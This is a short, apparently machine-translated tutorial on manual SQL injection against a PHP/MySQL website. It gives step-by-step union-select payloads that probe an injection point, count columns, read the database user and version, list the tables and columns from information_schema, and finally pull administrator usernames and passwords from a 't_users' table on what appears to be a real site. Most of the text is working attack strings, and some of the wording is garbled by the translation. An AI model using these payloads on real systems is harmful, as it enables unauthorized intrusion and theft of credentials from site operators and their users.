Php + mysql manual injection tutorial
Injection point: xxxxxxx and1 = 1 returned correct and1 = 2 returned error description injection point + order + by + 11 correct regret + order + by + 12 returned error
It indicates that there are 11 fields + union + select + 1, 2, 4, 5, 6, 7, 8, 9, 10, 11. I can see that it is-13, which enables him to report an error or use and 1 = 2 to report an error.
User () Database username Version () Database Version Database () currently used Database name + union + select + 1, user (), Version (),
5.0 instructions: You can directly query tables + union + select +, unhex (hex (GROUP_CONCAT (table_name, 10, 11 + from + information_schema.tables + where + table_schema = Database () directly burst the table
Ad_play, banner, baozhi, baozhi_class, flood, cdowns, chengyuan, downs, fuwu, guanyu, guanzhu, jobs, language, link, liuyan, Baidu, member, news, news_class, province, renli, store, store_class, store_class2, store_class3, t_china_class, t_china_store, t_lianxi, t_sts, t_users, t_world_class, t_world_store, video, example, word, works, example, example, zazhi, example, zazhidowns has a t_users which should be the storage administrator's first to convert t_users to hex burst columns: + union + select + 1, 2, 3, 4, unhex (hex (GROUP_CONCAT (column_name), 6, 7, 8, 9, 10, 11 + from + information_schema.columns + where + table_name = 0x745F7573657273
Then we query the + union + select + 1, 2, 3, 4, concat (0x3a, t_name, 0x3a, t_pass), 6, 7, 8, 9, 10, 11 + from + t_users
